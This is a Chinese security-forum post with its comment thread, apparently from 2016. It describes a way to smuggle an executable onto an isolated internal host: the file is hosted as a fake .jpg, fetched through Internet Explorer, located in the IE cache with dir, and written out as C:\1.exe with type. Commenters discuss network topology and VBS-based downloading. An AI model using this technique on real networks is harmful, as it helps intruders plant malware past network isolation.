一个奇葩的内网写入文件方法

2016-07-27 10:24:51 70 刘海哥 6963

引用90sec探讨的问题

找到一个可以上传图片的web站点。

"C:\Program Files\Internet Explorer\iexplore.exe" http://内网可以访问的站点/0/09/40/75/91ef76c6a7efce1bee5deaebac51f3deb48f6598.jpg

执行访问后会有缓存文件。

然后 cd 到C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files>

执行dir /s /w 91ef76c6a7efce1bee5deaebac51f3deb48f6598*.*   找到路径

接下来就是

 type 路径>C:\1.exe  应该可以突破他内网了。

类别渗透测试

关于作者

刘海哥5篇文章100篇回复

刘海哥

评论70次

要评论？请先登录或注册

10楼

刘海哥
2016-7-27 15:20

skyer：
vbs就可以调用ie组件下载……
回复|@ta
1

因为我不懂。

回复|@ta|踩(0)|顶(0)
9楼

skyer
2016-7-27 14:13

vbs就可以调用ie组件下载……

回复|@ta|踩(0)|顶(0)
8楼

7sins
2016-7-27 14:11

看上边没看懂，看完了楼主在下面的解释就明白了。，，。收下了~

回复|@ta|踩(0)|顶(0)
7楼

敌敌喂
2016-7-27 14:09

跟start有什么区别？

回复|@ta|踩(0)|顶(0)
6楼

dmjhs
2016-7-27 13:12

要是内网机器没有访问外网权限呢

回复|@ta|踩(0)|顶(0)
5楼

cjh521ya
2016-7-27 11:35

其实也可以vbs穿透啊

回复|@ta|踩(0)|顶(0)
4楼

刘海哥
2016-7-27 11:25

testst：
什么意思没看明白往内网数据库机器写文件？
回复|@ta
1

是需要有内网数据库服务器的权限。但是内网隔绝情况下。虽然我不知道行得通不我就本地测试了

回复|@ta|踩(0)|顶(0)
3楼

testst
2016-7-27 11:23

什么意思没看明白往内网数据库机器写文件？

回复|@ta|踩(0)|顶(0)
2楼

刘海哥
2016-7-27 11:04

LonelyRain：
能讲一下内网拓扑是怎么样的吗？是主机A我们已经有一个权限了。主机B在内网，主机B无法链接外网。通过主机B访问主机A生成缓存文件?
回复|@ta
1

是的，如果你有一台内网主机可控了我给你找个工具。你也可以参考这个https://www.t00ls.com/thread-34837-1-1.html

回复|@ta|踩(0)|顶(0)
1楼

LonelyRain
2016-7-27 10:57

能讲一下内网拓扑是怎么样的吗？是主机A我们已经有一个权限了。主机B在内网，主机B无法链接外网。通过主机B访问主机A生成缓存文件?

回复|@ta|踩(0)|顶(0)